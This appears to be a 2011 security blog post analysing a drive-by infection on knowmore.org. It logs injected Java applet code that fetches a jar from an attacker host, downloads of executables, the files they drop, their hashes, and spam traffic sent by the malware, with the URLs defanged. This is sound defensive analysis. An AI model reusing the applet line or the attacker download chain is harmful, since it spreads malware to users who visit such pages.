Tag Archives: knowmore.org infected

Knowmore.org Infected with Malicious Javascript Code

John has informed us about a new possible website infected:

hxxp://www.knowmore. org

A fast scan with vscan.urlvoid.com report that the site is infected:

Report 2011-03-19 01:20:31 (GMT 1)
File Name knowmore-org
File Size 22121 bytes
File Type Unknown file
MD5 Hash d29b303c72a2330ac13155be0b280221
SHA1 Hash 3cf9d0637551e0ce5ac7a9ce243b35e13caf5e80
Detections: 3 / 9 (33 %)
Status INFECTED

We have dumped the content of the website:

Knowmore-org Dump

So we have browsed the website in our test environment and this is the result:

GET /count11.php HTTP/1.0
Referer: hxxp://knowmore. org/
Host: maribit. com
 
GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0
Referer: hxxp://knowmore. org/
Host: kagrinn.cz. cc

Now there is a try to download a java applet:

<applet code='lort.cooter.class' archive='hxxp://kagrinn.cz. cc/efrthyjkfyiguytdsfsxz.jar' width='300' height='150'>

New network traffic:

GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0
Host: kagrinn.cz. cc

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 19 Mar 2011 00:54:42 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Accept-Ranges: bytes
Content-Length: 17920
Content-Disposition: inline; filename=setup.exe
 
MZ.............

Is downloaded the executable file setup.exe:

Report date: 2011-03-19 02:21:05 (GMT 1)
File name: setup.exe
File size: 17920 bytes
MD5 hash: 192b0b0d37d3a6666b584e876ca271e5
SHA1 hash: 7ca0e9f10a3cef8a7cc8b7831f675bd7089648f4
Detection rate: 0 on 9 (0%)

Another executable file is downloaded:

GET /client1.exe HTTP/1.0
Host: tamarer. com
 
HTTP/1.1 200 
Server: Apache
Content-Length: 650240
Content-Type: 
Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Fri, 18 Mar 2011 21:54:54 GMT
Last-Modified:Sat, 19 Mar 2011 00:52:41 GMT
Accept-Ranges:bytes
 
MZ.................

Files created during the infection:

c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\setup.exe
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\MPC5.tmp
c:\WINDOWS\Temp\_ex-68.exe
c:\WINDOWS\system32\Packet.dll
c:\WINDOWS\system32\wpcap.dll
c:\WINDOWS\system32\drivers\npf.sys

Report date: 2011-03-19 02:36:06 (GMT 1)
File name: ex-68-exe
File size: 650240 bytes
MD5 hash: 32f73e995554b8e601c0da661e9a4edb
SHA1 hash: 237cafc9c7c30adee5ac795afd4371fbc19aa41d
Detection rate: 0 on 9 (0%)

Other curious network traffic:

GET /FlopK4F8XFP3oZ1PmQ.htm HTTP/1.1
Host: 98.232.48.112
Content-Length: 594
User-Agent: Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5

Now the malware try to send spam messages:

220 Comendo Mailfence V3
 
HELO XXX
 
250 ec3-node2.net.comendo.com says HELO to XXX:53746
 
MAIL FROM:<xxx@alcatel-lucent.com>
 
250 MAIL FROM accepted
 
RCPT TO:<xxx@lpmail.com>
 
250 RCPT TO accepted
 
DATA
 
354 continue.  finished with "\r\n.\r\n"
 
[...]
 
Subject: Bring extra pleasance to your xxx-life!
 
[...]
 
FDA-approved blue-blu-colored med to heal ED! 
hxxp://healthcontrol. dk/jhkop806.html
 
[...]

So the spam message contains a http link:

healthcontrol. dk/jhkop806.html

That redirects to:

pillrxdrugstorechains. at

URLVoid domains analysis:

http://www.urlvoid.com/scan/kagrinn.cz.cc
http://www.urlvoid.com/scan/knowmore.org
http://www.urlvoid.com/scan/tamarer.com
http://www.urlvoid.com/scan/healthcontrol.dk
http://www.ipvoid.com/scan/98.232.48.112
http://www.urlvoid.com/scan/pillrxdrugstorechains.at